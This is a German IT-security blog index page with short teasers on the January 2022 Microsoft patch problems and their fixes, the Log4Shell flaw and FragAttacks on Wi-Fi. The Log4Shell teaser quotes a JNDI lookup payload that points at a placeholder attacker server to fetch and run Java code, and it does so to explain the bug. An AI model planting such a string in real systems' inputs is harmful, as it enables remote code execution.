21.01.2022 | 21:16 Uhr
 
WeBLOG
Einträge pro Seite anzeigen | Anzahl: 125 in IT-Sicherheit vorhanden 
    1  2  3  4  5  6  7 ... 32    
Fixes für die Januar-MS-Patches (18.01.2022)
Wie in diesem Beitrag berichtet, gab es mit den Januar-Sicherheitsupdates vom 11.01.2022 massive Probleme. Microsoft hat am gestrigen Abend (17.01.2022) Patches für die Patches ausgeliefert, welche die Schwierigkeiten beseitigen sollen. Die Installation ist jeweils optional, d.h. erfolgt nicht automatisch. Nachstehend eine Liste der Sonderupdates (Out-of-Band) mit Links zu den Supportbeiträgen der Redmonder:

MEHR (Beitrag vollständig anzeigen)...

Massive Probleme mit MS-Sicherheitsupdates vom Januar 2022 (13.01.2022)
Die letzten Windows-Sicherheitsupdates machen extremen Ärger. Vor allem Domain Controller unter Windows-Server-Systemen (2012 R2, 2016, 2019 und 2022) fallen in Boot-Schleifen.

Eigentlich sollte der bekannte Active Directory-Bug beseitigt werden und herausgekommen sind völlig unbrauchbare Server.

Anwender, die VPN-Verbindungen mit L2TP over IPSEC nutzen, werden ebenfalls enttäucht sein, denn diese funktionieren nicht mehr. Dies betrifft auch Windows 10 und 11.


MEHR (Beitrag vollständig anzeigen)...

Log4j und die Log4Shell-Lücke (14.12.2021)
Der Fehler liegt in der "Log4Shell" in der weit verbreiteten Java-Logging-Bibliothek "Log4j". Es lässt sich quasi beliebiger Code ausführen und das dazu noch sehr einfach. In der Java-Welt kommt diese Bibliothek häufig vor, um Prozesse zu protokollieren und etwaige Fehler zu finden.

Das Problem dabei ist, dass "Log4Shell" nicht einfach nur schreibt, sondern darüber hinaus versucht den Protokolltext zu interpretieren. Enthält dieser z.B. die Zeichenfolge "${jndi:ldap://angreifer.server.de/a}", dann ist das Kind in den Brunnen gefallen, weil der Dienst den Server "angreifer.server.de" kontaktiert und von diesem ungefragt Java-Code entgegennimmt und ausführt.


MEHR (Beitrag vollständig anzeigen)...

FragAttacks bedrohen fast alle WLAN-Geräte (13.05.2021)
Designprobleme und Fehler in der Umsetzung von WLAN-Standards bzgl. der Behandlung von Frames reissen Lücken in die WLAN-Sicherheit bis einschliesslich WPA3 (Wi-Fi Protected Access = legt das Verfahren zur Anmeldung eines WLAN-Geräts an der WLAN-Basisstation fest).

Ein Angreifer, der sich in Reichweite des Funknetzwerks befindet, könnte so eigene Pakete in ein eigentlich gesichertes WLAN einschleusen, um beispielsweise WLAN-Geräte zu attackieren oder in unzureichend gesicherte, ungepatchte Systeme einzudringen, um diese zu übernehmen (gelingt es gar eine NAT-Firewall zu durchbohren, wäre dies besonders heikel für das gesamte Netzwerk).


MEHR (Beitrag vollständig anzeigen)...

    1  2  3  4  5  6  7 ... 32